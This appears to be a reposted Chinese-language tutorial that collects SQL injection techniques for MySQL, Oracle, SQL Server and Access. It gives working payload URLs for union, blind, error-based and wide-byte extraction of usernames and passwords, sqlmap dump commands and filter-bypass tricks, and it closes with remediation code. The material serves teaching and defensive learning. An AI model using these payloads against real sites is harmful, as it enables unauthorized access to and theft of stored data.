sql注入学习-知识点大合集

news2025/1/19 8:01:32

目录

(一)sql注入了解:

1.1什么是sql注入

1.2 sql注入的分类

(二)sql注入详解:

2.1.MySQL注入

2.2.1在MySQL注入中,会用到的知识

 2.2.2mysql常用语句与常见

2.2.3msyql注入内容详解

2.2.Oracle注入

2.2.1Oracle注入基础

2.2.2联合查询注入

2.3.SQL Server注入

2.3.1SQL Server 关键目录试图

2.3.2 SQL Server注入过程:

2.4.Access注入

2.2.1Access数据库基础

 2.4.2Access爆破注入过程

2.5 二次注入

2.6 自动化SQL注入神器SQLMAP

 2.6.1常用命令:

 2.6.2sqlmap注入过程命令:

2.7 SQL注入绕过

2.7.1空格过滤绕过

2.7.2内联注入绕过

2.7.3大小写绕过

2.7.4双写关键字绕过

2.7.5编码绕过

2.7.6等价函数字符替换绕过

2.8.MySQL注入漏洞修复

2.8.1 代码层修复

2.8.2服务器修复


(一)sql注入了解:

1.1什么是sql注入

SQL注入漏洞是一种常见的攻击漏洞,攻击者通过将恶意的SQL代码注入到用户输入的表单或者URL参数中,使得数据库执行恶意SQL语句,并获取、修改或者删除未授权的数据。

简单来说,就是攻击者通过在输入框或URL参数中注入恶意SQL语句,从而绕过系统的验证,获取或者修改敏感数据。

例如:

正常情况下,

有过一个查询网址是https://example.com/info.php,

用户点击查询之后,网址的url变成了:https://example.com/info.php?id=1,其中id是传送的参数,这个参数是要进入数据库查询的关键参数,

等到数据库,进行查询,语句是SELECT * FROM users WHERE id='1' ,返回结果之后,再从传输到客户端,展现给用户。

sql注入情况下:

攻击者会在url中加入后缀载入一些东西,例如:https://example.com/info.php?id=1' OR '1'='1,到数据查询也会变成:

SELECT * FROM users WHERE id='1' OR '1'='1';

在条sql查询语句中,查询条件是 id='1' OR '1'='1',因为OR的右边'1'='1'是rrue,所以导致这个语句是true,数据库会正常查询语句,会把查到的信息传输到客户端中,这样攻击者就成功地通过SQL注入攻击获取了未授权的数据。这个就是简单的sql注入案例。

1.2 sql注入的分类

根据数据类型分为

  1. 数字型SQL注入:针对数值型数据类型进行注入的攻击,例如整型和浮点型。这种攻击一般针对表单输入中的数字型数据进行,攻击者在输入框中注入非数字字符或者字母、下划线等特殊字符,来绕过输入验证,从而执行攻击操作。

  2. 字符型SQL注入:针对字符型数据类型进行注入的攻击,例如字符串型、日期型和时间型。攻击者通过在表单输入框中输入字符串或者特殊字符来进行字符型SQL注入攻击,来绕过应用程序的验证,访问或修改数据中的敏感信息。

数字型:

提交 1 and 1=1

语句变成SELECT * FROM users WHERE id=1 and 1=1 limit 0,1

这时语句前值后值都为真,and以后也为真,返回查询到的数据。

执行了攻击者额外的SQL查询语句,导致SQL注入漏洞猜列名。

字符型:

提交 1’ and ‘1’=‘1

语句变成SELECT * FROM users WHERE id=‘1’ and ‘1’=‘1’limit 0,1 

这时语句前值后值都为真,and以后也为真,返回查询到的数据。

执行了攻击者额外的SQL查询语句,导致SQL注入漏洞猜列名。
 

根据返回结果分为

  1. 报错型:攻击者注入的恶意代码可以使得SQL查询返回报错信息。在这种情况下,攻击者可以通过观察返回结果来验证注入的代码是否成功,并进一步获取敏感数据。

  2. 盲注型:攻击者注入的恶意代码无法直接获取查询的结果,而是利用漏洞合并多个查询或执行其他事务的结果来确认信息的泄露。在这种情况下,攻击者凭借对应用程序的深刻了解来感知和验证自己的注入是否成功。

(二)sql注入详解:

2.1.MySQL注入

2.2.1在MySQL注入中,会用到的知识

在MySQL注入中,会运用到的函数有:

函数 / 语句

功能

user()

当前用户名

database()

当前所用数据库

current_user()

当前用户名(可用来查看权限)

version()

数据库的版本

@@datadir

数据库的路径

@@version_compile_os

操作系统版本

into dumpfile

写文件操作

into outfile写文件
load_file()读文件操作
concat(str1,str2..)连接字符串,连接两个或多个数组
group_concat(str1,str2..)连接字符串,能将相同的行组合起来
length() 计算字符串长度
hex()  字符转换为16进制

mysql注释:

  • 单行注释,#后面直接加内容
  • 单行注释,--后面必须要加空格
  • 多行注释,/**/中间可以跨行

mysql数据库中information_schema库

information_schema库是sql注入的重要对象,从MySQL 5开始,MySQL自带information_schema数据库,它提供了访问数据库元数据的方式。元数据是关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。

 mysql数据库中mysql库

MySQL库这个是MySQL的核心数据库,主要负责存储数据库的用户、权限设置、关键字等MySQL数据库需要使用的控制和管理信息。

 2.2.2mysql常用语句与常见

  • union语句
  • order by语句
  • limit 语句

常用场景:

判断是否存在注入与求闭合字符

数字型:

id  = 1’                返回不正常

id = 1 and  1 =1    正常返回

id = 1 and  1=2     不正常返回

字符型:

id  = 1' 异常

id = 1' and  '1' ='1 正常返回

id = 1' and  '1' ='2 不正常返回

判断列数

id = 1 order by n     正常返回

id = 1 order by n+1   不正常返回

结果:数据表中共有n列,(判断列数,需要一次次尝试)

判断显错点

 输入union select 1,2,3  返回1,2,3,说明123都是显错点

获取库名

输入 and 1=2 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3

获取到当前用户为ctfswiki@localhost,当前数据库为ctfswiki,当前的版本为5.1.73

获取列名

输入:http://www.test.com//index.php?id=1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='ctfswiki' and table_name='user'。从information_schema.columns 表中,取出数据库名为ctfswiki,表名为user的所有列名,获得id,username,password这三个列。

获取数据

输入:http://www.test.com//index.php?id=1 and 1=2 union select 1,group_concat(username,' ',password),3 from user user表中取出usernamepassword列中的数据,得到user1 pass1等多个用户名密码信息。

2.2.3msyql注入内容详解

盲注型

SQL 盲注是一种常见的技术。不会直接返回攻击者所需要的数据,需要通过特定的技巧进行获取。SQL 盲注可分为两种基本形式:

  1. 布尔盲注(bool):可以在 SQL 查询中通过修改查询条件让其返回不同的结果,通过判断查询结果来判断查询条件是否正确。如果能够正确推断出查询结果,则可以进行下一步攻击操作。

  2. 时间盲注(sleep):攻击者可以通过特殊的 SQL 语句在数据库中执行延迟操作,通过检查应用程序的响应时间来推断 SQL 查询结果是否符合预期。在时间盲注中,攻击者需要构造特殊的 SQL 语句,并观察应用程序对该语句执行的响应时间来判断 SQL 查询的结果是否为真或假。

在 SQL 注入攻击中,攻击者可以通过 SQL 盲注技术逐步获取目标数据库中的敏感信息,例如用户名和密码等,然后继续对数据库进行进一步的攻击。因此,在设计和实现应用程序时,需要更加注重用户输入数据的校验和安全性防护,避免 SQL 注入等基本漏洞的利用。

1、bool注入

常用函数:

substring函数:截取字符串的长

例如:substring(字段名,A, N),这个函数是用来截取()里的字段从第A个长度起往后截取N个字,比如substring(username,1,2)就表示从username字段中从第1个字符向后截取2位,包括第1个字符,比如值为admin,截取的就是ad

ascii函数:返回ascii码,多用于猜测数据库、表名、字段名的名称

例如:ascii('a') ,返回a字母的ascii97

bool注入存在原因分析

 

$id参数没有过滤直接拼接到数据库中执行,存在数字型注入。

输入参数id进行SQL注入,SQL语句执行后,$result返回真,应用程序并没有输出查询的结果,而是显示ok字符串;$result返回假,显示空,这样就无法通过SQL注入将数据库的查询结果显示到前端页面中,因此只能通过前端页面显示的是ok字符串,来判断输入的SQL注入测试语句的是否正常,以此进行注入。

获取到数据库:

1、输入http://www.test.com/index.php?id=1  and (select ASCII(SUBSTRING (database(),1,1)))>98

页面返回正常,说明数据库的第一个字符的ASCII码大于98

2、输入http://www.test.com/index.php?id=1  and (select ASCII(SUBSTRING (database(),1,1)))>99

页面返回不正常,说明数据库的第一个字符的ASCII码不大于98,也就是99,说明是字符c

3、通过and (select ASCII(SUBSTRING (database(),1,1)))>X,获取到数据库中其他字符串的信息,得到数据库的名称为ctfswiki

获取表

http://www.test.com/index.php?id=33 and ascii(substr((select table_name from information_schema.tables where table_schema='cms' limit 0,1),1,1))<100

测试当前cms数据库的第一个表的第一个字符的ASCII码是否小于100,不断测试,直至成功判断第一个字符的ASCII码。

http://www.test.com/index.php?id=33 and ascii(substr((select table_name from information_schema.tables where table_schema='cms' limit 0,1),2,1))<109

测试当前cms数据库的第一个表的第二个字符的ASCII码是否小于109,不断测试,直至成功判断第二个字符的ASCII码

获取数据:

http://www.test.com/index.php?id=35 and ascii(substring((select username from cms.cms_users limit 0,1),1,1))>100

测试cms数据库cms_users表中username列的一个数据的第一个字符是否大于100,不断测试,直至成功判断第一个字符的ASCII码。

2、sleep注入

sleep获取数据库:

1、输入http://www.test.com/index.php?id=1 and sleep( if(ascii(substr(database(),1,1))>99,0,5))

执行完发现页面执行了5s,说明数据库的第一个字符的ASCII码不大于99

2、输入http://www.test.com/index.php?id=1 and sleep( if(ascii(substr(database(),1,1))>98,0,5))

执行完发现页面执行了0s,说明数据库的第一个字符的ASCII码大于98,也就是99,说明是字符c

3、通过and sleep( if(ascii(substr(database(),1,1))>x,0,5)),获取到数据库中其他字符串的信息,得到数据库的名称为ctfswiki

sleep获取数据表:

http://www.test.com/index.php?id=1 and sleep( if(ascii(substr((select table_name from information_schema.tables where table_schema='ctfswiki' limit 0,1),1,1))<101,0,5 ))

sleep获取数据

1、判断表中的列信息,例如user表

http://www.test.com/index.php?id=1 and sleep( if(ascii(substr((select column_name from information_schema.columns where table_name='user' and table_schema='ctfswiki' limit 0,1),1,1))<105,0,5 ))

2、判断列的值

http://www.test.com/index.php?id=1 and sleep( if(ascii(substring((select username from ctfswiki.user limit 0,1),1,1))<69,0,5 ))

报错型

报错型是一种常见的注入方式,攻击者可以通过构造恶意的 SQL 语句触发数据库引擎抛出错误信息,然后利用这些错误信息来获取目标数据库中的敏感信息,报错型有三种

1、floor报错注入

2、updatexml报错注入

3、extractvalue报错注入

1、floor报错注入

floor报错注入原因分析:

floor报错注入是MySQL报错注入的一种方式,主要原因是rand函数与group by一起使用时,rand函数会计算多次导致了报错产生的注入

  • floor(x) 函数返回不大于x的最大整数值
  • rand() 函数会返回一个0-1之间的随机数

获取当前数据库名称

http://www.test.com//index.php?id=1 and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)

获取当前数据库的表名

http://www.test.com//index.php?id=1 and (select 1 from (select count(*),concat((select (table_name) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

获取当前数据库的列名

http://www.test.com/index.php?id=1 and (select 1 from (select count(*),concat((select (column_name) from information_schema.columns where table_schema=database() and table_name='user' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

获取数据

http://www.test.com/index.php?id=1 and(select 1 from(select count(*),concat((select username from user limit 0,1),0x3a,floor(rand()*2))x from information_schema.tables group by x)a)

2、updatexml报错注入

updatexml报错注入原因分析

updatexml注入也是一种报错注入,是利用了updatexml函数中第二个参数XPath_string的报错进行注入。XPath_string正常的格式是xml路径,格式是/xxx/xxx/xxx/,如果格式不正确就会报错,updatexml注入就是利用了XPath_string的报错进行注入。

updatexml函数:
UPDATEXML (XML_document, XPath_string, new_value); 
第一个参数:XML_document是String格式,目标XML文档。
第二个参数:XPath_string (Xpath格式的字符串),xml路径,正常的格式是
/xxx/xxx/xxx/,如果格式不正确就会报错,updatexml注入就是利用了XPath_string的报错    进行注入。
第三个参数:new_value,String格式,替换查找到的符合条件的数据。

updatexml报错注入过程

获取数据名:

通过http://ip/index.php?id=1 and updatexml(1,concat(0x7e,(database())),0) #

可以通过updatexml报错获取到当前的数据库为ctfswiki

3、extractvalue报错注入

extractvalue函数可以对XML文档进行查询,extractvalue报错注入与updatexml报错注入的原理一样,也是利用了函数中第二个参数XPath_stringXPath_string正常的格式是xml路径,格式是/xxx/xxx/xxx/,如果格式不正确就会报错,extractvalue注入就是利用了XPath_string 的报错进行注入。

 获取数据库

http://ip/index.php?id=1 and extractvalue(1,concat(0x7e,(database())),0) #

可以通过updatexml报错获取到当前的数据库为ctfswiki

宽字节注入

宽字节注入原因分析:

宽字节注入漏洞产生的原因:开发者为了防止出现SQL注入攻击,将用户输入的数据用addslashes等函数进行过滤。addslashes等函数会默认将单引号等字符进行转义,这样就可以避免注入。宽字节注入产生的原因是MySQL在使用GBK编码的时候,如果第一个字符的ASCII码大于128时,会认为两个字符是一个汉字,会将后面的转义字符“\”吃掉,拼接为汉字,这样就可以将SQL语句闭合,造成宽字节注入

 宽字节注入过程:

1、查看数据库的名称

http://ip/index.php?id=1%81' and 1=2 union select 1,database(),3 %23

2、查看所有的表信息

http://ip/index.php?id=1%81' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x6374667377696b69%23

3、查看user表的列信息

http://ip/index.php?id=1%81' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x6374667377696b69 and table_name=0x75736572 %23

4、查看列的值

http://ip/index.php?id=1%81'  and 1=2 union select 1,group_concat(username, 0x2a2a2a, password),3 from user %23

2.2.Oracle注入

2.2.1Oracle注入基础

(1) 数据字典

元数据的集合,从逻辑上和物理上描述了数据库及内容,存储于SYSTEM与SYSAUX表空间内的若干段。

(2)数据字典视图

数据字典基表中的数据比较复杂,一般是查询数据字典视图。 数据字典视图有3个不同权限的分类,分别以USER、ALL、DBA的前缀开头。

1)user_tables表

user_tables表中存储了用户的拥有的表的信息,类似于MySQL数据库的information_schema数据库中的tables表。

2)user_tab_columns表

user_tab_columns表中存储了用户的拥有的列的信息,类似于MySQL数据库的information_schema数据库中的columns表。

3)dual表

dual表是 Oracle数据库中实际存在的表,任何用户均可读取,常用在Oracle注入中没有目标表的select语句块中进行注入。

2.2.2联合查询注入

(1) 判断注入点

http://192.168.91.142:8080/index.jsp?id=1 and 1=1

(2) 判断列数

http://192.168.91.142:8080/index.jsp?id=1 order by 1

(3) 判断显错点

http://192.168.91.142:8080/index.jsp?id=1 union select null,null,null from dual

(4) 获取当前数据库

http://192.168.91.142:8080/index.jsp?id=1 union select null,null,SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual

(5) 获取数据库中的表

http://192.168.91.142:8080/index.jsp?id=1 and 1=2 union select null,null,table_name from user_tables

(6) 获取表中的列

http://192.168.91.142:8080/index.jsp?id=1 and 1=2 union select null,null,column_name from user_tab_columns

(7) 获取列中的数据

http://192.168.91.142:8080/index.jsp?id=1 and 1=2 union select null,"username","password" from "user"

2.3.SQL Server注入

2.3.1SQL Server 关键目录试图

SQL Server包含了sysdatabases、sysobjects、syscolumns 3个视图。

1.sysdatabases

sysdatabases(存储数据库名):保存了数据库相关的信息。最初安装 SQL Server 时,sysdatabases 包含 master、model、msdb、mssqlweb 和 tempdb 数据库的项。sysdatabases中的信息存储在 master 数据库中。

2.sysobjects

sysobjects(存储表名):SQL-SERVER的每个数据库内都有此系统表,它存放该数据库内创建的所有对象。如约束、默认值、日志、规则、存储过程等,每个对象在表中占一行。以下是此系统表的字段名称和相关说明。name,id,xtype,uid,status:分别是对象名,对象ID,对象类型,所有者对象的用户ID,对象状态。

3.syscolumns

syscolumns(存储列名):每个表和视图中的每列在表中占一行,存储过程中的每个参数在表中也占一行。该表位于每个数据库中。主要字段有:name、id、colid,分别是字段名称,表ID号,字段ID号,其中的表ID号与sysobjects中的表ID号相同。 

2.3.2 SQL Server注入过程:

(1) 获取当前数据库

有两种报错注入的方式可以获取到数据库的名称。

第一种方式:通过sys.databases表获取:

http://www.test.com/News.asp?SortID=1&ItemID=46 and (select top 1 name from sys.databases) >0

第二种方式:通过db_name()函数获取,db_name()是sql server的内置函数,可以查询当前数据库的名称,然后与0比较导致类型比较报错,获取到数据库信息:

http://www.test.com/News.asp?SortID=1&ItemID=46 and db_name()>0

(2) 获取数据库中的表

http://www.test.com/News.asp?SortID=1&ItemID=46 and 0<(select top 1 name from sec.dbo.sysobjects where xtype='U')

(3) 获取数据库中表中的列

http://www.test.com/News.asp?SortID=1&ItemID=46 and 0<(select top 1 name from sec.dbo.syscolumns where id=(select id from sec.dbo.sysobjects where xtype='U' and name='eims_User'))

(4) 获取数据库列中的数据

http://www.test.com/News.asp?SortID=1&ItemID=46 and 0<(select top 1 item1 from sec.dbo.eims_User)

2.4.Access注入

2.2.1Access数据库基础

1.  Access数据库的系统结构

常见的Access数据库的扩展名是mdb和accdb,主要包括:表、查询、窗体、报表、数据访问页、宏、模块。

表:数据库中用来存储数据的对象,是数据库的核心和基础表由表结构和表内容(记录)两部分组成。在对表操作时,是对表结构和表内容分别进行的。表结构包括表名和字段属性两部分。

2.  Access数据库系统表

Access数据库系统表包括MSysAccessObjects、MSysAccessXML、MSysACEs、MSysNameMap、MSysNavPaneGroupCategories、MSysNavPaneGroups、MSysNavPaneObjectIDs、  

MSysNavPaneGroupToObjects、MSysObjects、MSysQueries、MSysRelationships。

MSysObjects中包含了所有的数据库对象,但是默认情况都不允许访问系统数据库表

 2.4.2Access爆破注入过程

(1) 猜测数据库中的表

http://www.test.com/NewsInfo.asp?Id=130 and exists (select * from TableName)

(2) 猜测数据库中表中的列

http://www.test.com/NewsInfo.asp?Id=130 and exists (select ColumnName from TableName)

(3) 判断列数

http://www.test.com/NewsInfo.asp?Id=130 order by 7

(4) 查看显错点

http://www.test.com/NewsInfo.asp?Id=130 and 1=2 union select 1,2,3,4,5,6,7 from TableName

(5) 获取数据

http://www.test.com/NewsInfo.asp?Id=130 and 1=2 union select1,ColumnName1,3,4,ColumnName2,6,7 from TableName

2.5 二次注入

二次注入漏洞是SQL注入的一种形式,是在Web应用程序中经常出现的Web类型漏洞。

二次注入的原理:第一次在参数中输入恶意数据插入的时候,由于存在addslashes等函数的过滤,会将特殊字符添加"\"进行转义,但是转义字符"\"并不会存入到数据库中,这样下一次进行查询时,如果没有过滤,直接从数据库中取出恶意数据并执行,就造成了SQL注入

2.6 自动化SQL注入神器SQLMAP

SQLMAP是一个自动化的SQL注入工具,其主要功能是发现并利用给定的URLSQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQLServer, Microsoft Access, IBM DB2, SQLite, Firebird, SybaseSAP MaxDB

       

SQLMAP支持五种不同的注入模式:

        1、基于布尔的盲注。

        2、基于时间的盲注。

        3、基于报错注入。

        4、联合查询注入。

        5、堆查询注入。

SQLMAP的支持7种显示等级,默认为1等级

等级0:只显示python错误以及严重的信息。

等级1:同时显示基本信息和警告信息。(默认

等级2:同时显示debug信息。

等级3:同时显示注入的payload。

等级4:同时显示HTTP请求。

等级5:同时显示HTTP响应头。

等级6:同时显示HTTP响应页面。

 2.6.1常用命令:

(1)-u或者--url 指定注入目标URL

sqlmap -u http://ip/index.php?id=1

(2)--dbms 指定数据库

sqlmap -u http://ip/index. php?id=1 --dbms=mysql

(3)--os 指定系统

sqlmap -u http://ip/index.php?id=1 --os=Windows

(4)--flush-session 刷新缓存

sqlmap -u http://ip/index.php?id=1 --flush-session

(5)--proxy 指定代理

sqlmap -u http://ip/index.php?id=1 --proxy http://ip:port

(6)--user-agent 指定useragent信息

sqlmap -u http://ip/index.php?id=1 --user-agent='Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'

(7)--data 数据以POST方式提交

 2.6.2sqlmap注入过程命令:

1)列出所有的数据库

sqlmap -u http://ip/index.php?id=1 --dbs  

(2)列出当前数据库

sqlmap -u http://ip/index.php?id=1 --current-db  

(3)列出DBname数据库所有的表

sqlmap -u http://ip/index.php?id=1 -D 'DBname'  --tables  

(4)列出DBname数据库table表中的所有列

sqlmap -u http://ip/index.php?id=1 -D 'DBname'  -T 'table' --columns  

(5)获取DBname数据库table表中column1,column2列中的数据

sqlmap -u http://ip/index.php?id=1 -D 'DBname'  -T 'table' -C 'column1,column2' --dump

2.7 SQL注入绕过

2.7.1空格过滤绕过

应用程序的过滤规则,会将空格设置为黑名单,但是空格存在多种绕过方式,常见的包括 /**/、tab键、%0a、`来代替空格进行绕过。

2.7.2内联注入绕过

MySQL会执行放在 /! ... /中里面语句,/!50010 ... /也可以执行里面的SQL语句,其中5.00.10 为MySQL版本号,当MySQL数据库的实际版本大于内联注释中的版本就会执行里面的代码,可以利用MySQL的这个特性绕过特殊字符过滤。

2.7.3大小写绕过

应用程序的过滤规则,通常会针对恶意关键词设置黑名单,如果存在恶意关键词就会退出,但是可能存在过滤不完整或者是只过滤小写或者大写的情况,没有针对大小写组合进行过滤,导致可以通过大小写混写payload的方式来绕过过滤。

 

2.7.4双写关键字绕过

应用程序的过滤规则,通常会针对恶意关键词设置黑名单,如果存在恶意关键词就会替换为空字符,但是没有多次匹配判断,就可以通过双写字符串的方式来绕过过滤。

2.7.5编码绕过

双重url编码绕过

 16进制编码绕过

 Unicode编码绕过

 ASCII编码绕过

2.7.6等价函数字符替换绕过

      Mysql查询:Union distinctupdatexmlExtractvaluefloor

      字符串截取函数:midsubstrsubstringleftreverse

      字符串连接函数:concatgroup_concatconcat_ws

      字符串转换:charhexunhex

      替换逗号:limit 1 offset 0mid(version() from 1 for 1)

      替换等号:likein

2.8.MySQL注入漏洞修复

2.8.1 代码层修复

防止字符型注入

字符型注入可以用htmlspecialchars函数、MySQL_real_escape_string函数和addslashes函数,进行特殊字符转换防止注入

$id=$_GET['id'];

$id =htmlspecialchars(addslashes($id));

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

$result=mysql_query($sql);

$row = mysql_fetch_array($result);

 参数化查询防止注入

参数化查询防止注入mysqli 和 PDO 这两个新扩展都支持参数化查询。

$mysqli = new mysqli("localhost", "dbusername", "dbpassword", "database");

$username = "somename";

$password = "someword";

$query = "SELECT filename, filesize FROM users WHERE (name = ?) and (password = ?)";

$stmt = $mysqli->stmt_init();

if ($stmt->prepare($query)) {

    $stmt->bind_param("ss", $username, $password);

$stmt->execute();

$stmt->bind_result($filename, $filesize);

    while ($stmt->fetch()) {

        printf ("%s : %d\n", $filename, $filesize);

    }

    $stmt->close();

}

$mysqli->close();

2.8.2服务器修复

(1) magic_quotes_gpc配置

当 magic_quotess_gpc为on,所有的'(单引号)、"(双引号)、\(反斜杠)和NULL's被一个反斜杠自动转义。该设置将自动影响$_GET 、 $_POST 、$_COOKIE数组的值,在PHP 4,$_ENV也会被转义。

注意:本特性已自 PHP 5.3.0 起废弃并将自 PHP 5.4.0 起移除。

(2) magic_quotes_sybase配置

magic_quotes_sybase会将单引号('),转义为两个单引号(''),但是只将magic_quotes_sybase设置为on并不生效,需要将magic_quotes_gpc也设置为on,magic_quotes_sybase才会生效。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/576042.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

首发出炉Yolov5/Yolov7涨点神器:华为诺亚2023极简的神经网络模型 VanillaNet---VanillaBlock助力检测,实现暴力涨点

在​crack缺陷检测项目map 0.954提升至 0.979,涨点明显,博主多个数据集亲测有效,实现暴力涨点; 1.VanillaNet 论文:https://arxiv.org/pdf/2305.12972.pdf 来自华为诺亚、悉尼大学的研究者们提出了一种极简的神经网络模型 VanillaNet,以极简主义的设计为理念,网络中仅仅…

connect reset/timeout/reject 排查

异常排查 问题描述问题处理初步分析http配置即服务整体情况整体排查服务重启gcCPUJVM 暂存疑问点总结启动参数要配全监控体系健全科学使用jar包降配参数是参数得动态变 问题描述 最初出现的时候&#xff0c;是在每天的早上8-10这个时间范围内&#xff0c;服务A上的有一个接口时…

第一行代码 第十二章 Material Design实战

第12章 Material Design实战 其实长久以来&#xff0c;大多数人都认为Android系统的UI并不算美观&#xff0c;至少没有iOS系统的美观。以至于很多IT公司在进行应用界面设计的时候&#xff0c;为了保证双平台的统一性&#xff0c;强制要求Android端的界面风格必须和iOS端一致。…

Java08——继承

1. 继承 父类&#xff1a; package com.zsq.extend.improve_; //是pupil和graduate的父类 public class Student {public String name;public int age;private double score;public void info(){System.out.println("姓名&#xff1a;" name " 年龄&#xff1…

六级备考21天|CET-6|写作技巧2|13:00~14:40

目录 【一】写作技巧1的作业 [1]Creativity [2]谚语&#xff1a;值得做的就值得做得好 [3]Star chasing 追星​ [4]team spirit&communication 团队精神和交流 [5]谚语&#xff1a;理解​ 【二】谚语重要性开头模版 [1]谚语&#xff1a;Understand 理解 【三】社会…

【历史上的今天】4 月 26 日:验证码的发明者诞生;切尔诺贝利病毒爆发;诺基亚收购 Withings

整理 | 王启隆 透过「历史上的今天」&#xff0c;从过去看未来&#xff0c;从现在亦可以改变未来。 今天是 2023 年 4 月 26 日&#xff0c;在 2017 年的今天&#xff0c;中国首艘国产 001A 型航空母舰在大连完成了下水&#xff0c;从开工到下水&#xff0c;历时 3 年多时间。…

5月跳槽进字节跳动测试岗了,面试真简单...

前言: 最近金三银四跳槽季&#xff0c;相信很多小伙伴都在面试找工作&#xff0c; 怎样才能拿到大厂的offer&#xff0c;没有掌握绝对的技术&#xff0c;那么就要不断的学习&#xff0c;没有绝对的天才&#xff0c;只有持续不断的付出。对于我们每一个平凡人来说&#xff0c;…

利用Servlet编写第一个“hello world“

利用Servlet编写第一个"hello world" &#x1f50e;创建 Maven 项目&#x1f50e;引入依赖&#x1f50e;创建目录&#x1f50e;编写代码&#x1f50e;打包代码&#x1f50e;部署&#x1f50e;程序验证&#x1f50e;结尾 &#x1f50e;创建 Maven 项目 Maven 是一个构…

基于yolov5的车辆行人道路检测

一、数据集介绍 本实验使用自动驾驶的公开数据集BDD100K。   数据格式&#xff1a;BDD100K 数据集包含10万段高清视频&#xff0c;每个视频约40秒\720p\30 fps&#xff0c;总时间超过1,100小时。视频序列还包括GPS位置、IMU数据和时间戳&#xff1b;视频带有由手机记录的GPS/…

【刷题之路】LeetCode 1700. 无法吃午餐的学生数量

【刷题之路】LeetCode 1700. 无法吃午餐的学生数量 一、题目描述二、解题1、思路分析2、代码实现2.1、先将队列实现一2.2、代码实现 一、题目描述 原题连接&#xff1a; 1700. 无法吃午餐的学生数量 题目描述&#xff1a; 学校的自助午餐提供圆形和方形的三明治&#xff0c;分…

进程信号之产生

目录 &#x1f3c6;一、认识信号 &#x1f3c6;二、信号的产生 ①通过终端按键产生信号 ②调用系统函数向进程发信号 ③由硬件异常产生信号 ④软件条件产生信号 &#x1f3c6;三、进程退出时的核心转储的问题 &#x1f3c6;一、认识信号 生活中&#xff0c;有很多信号…

Python 下载的 11 种姿势,一种比一种高级

今天我们一起学习如何使用不同的Python模块从web下载文件。此外&#xff0c;你将下载常规文件、web页面、Amazon S3和其他资源。 通过本文的学习&#xff0c;你将学到如何克服可能遇到的各种挑战&#xff0c;例如下载重定向的文件、下载大型文件、完成一个多线程下载以及其他策…

面试官:你会从哪些维度进行MySQL性能优化?

面试官如果问你&#xff1a;你会从哪些维度进行MySQL性能优化&#xff1f;你会怎么回答&#xff1f; 所谓的性能优化&#xff0c;一般针对的是MySQL查询的优化。既然是优化查询&#xff0c;我们自然要先知道查询操作要经过哪些环节&#xff0c;然后思考可以在哪些环节进行优化…

English Learning - L3 作业打卡 Lesson3 Day21 2023.5.25 周四

English Learning - L3 作业打卡 Lesson3 Day21 2023.5.25 周四 引言&#x1f349;句1: Here is another expression about meat one man’s meat is another man’s poison.成分划分连读爆破语调 &#x1f349;句2: In other words, one person might like something very muc…

postMessage引发XSS

这次的主题是postMessage未验证消息来源origin&#xff0c;导致恶意代码注入的dom-xss&#xff0c;由于很少人关注这类型的注入&#xff0c;因为挖掘难度中等&#xff0c;需要一定的javascript代码审计能力&#xff0c;且漏洞危害等级不高&#xff0c;导致国内许多SRC都存在跨域…

【计算机网络】 7、websocket 概念、sdk、实现

文章目录 一、背景二、简介三、client3.1 ws 构造函数3.2 ws.readyState3.3 ws.onopen3.4 ws.onclose3.5 ws.onmessage3.6 ws.send3.7 ws.bufferedAmount3.8 ws.onerror 四、server4.1 go4.1.1 apifox client4.1.2 js client 五、范式 一、背景 已经有了 http 协议&#xff0c…

懂点自动化基础就要25k? 测试总监:给你15K,爱来不来

公司前段缺人&#xff0c;也面了不少测试&#xff0c;结果竟然没有一个合适的。一开始瞄准的就是中级的水准&#xff0c;也没指望来大牛&#xff0c;提供的薪资在10-25k&#xff0c;面试的人很多&#xff0c;但平均水平很让人失望。看简历很多都是3年工作经验&#xff0c;但面试…

【C++11】C++的新特性(详解)

文章目录 1.C11简介2.统一的列表初始化2.1{}初始化2.2 std::initializer_list 3.声明3.1 auto3.2 decltype3.3 nullptr 4.范围for5.STL中一些变化5.1 array5.2 forward_list容器5.3 unordered_map和unordered_set容器 1.C11简介 相比于C98/03&#xff0c;C11则带来了数量可观的…

2023年武汉市职业院校技能大赛“网络安全”竞赛任务书

2023年武汉市职业院校技能大赛“网络安全” 竞赛任务书 一、竞赛时间 总计&#xff1a;360分钟 竞赛阶段 竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值 A模块 A-1 登录安全加固 180分钟 200分 A-2 本地安全策略配置 A-3 流量完整性保护 A-4 事件监控 A-5 服…

2023年电工杯B题半成品论文使用讲解

注&#xff1a;蓝色字体为说明备注解释字体&#xff0c;不能出现在大家的论文里。黑色字体为论文部分&#xff0c;大家可以根据红色字体的注记进行摘抄。该文件为半成品论文&#xff0c;即引导大家每一步做什么&#xff0c;怎么做&#xff0c;展示按着本团队的解题思路进行建模…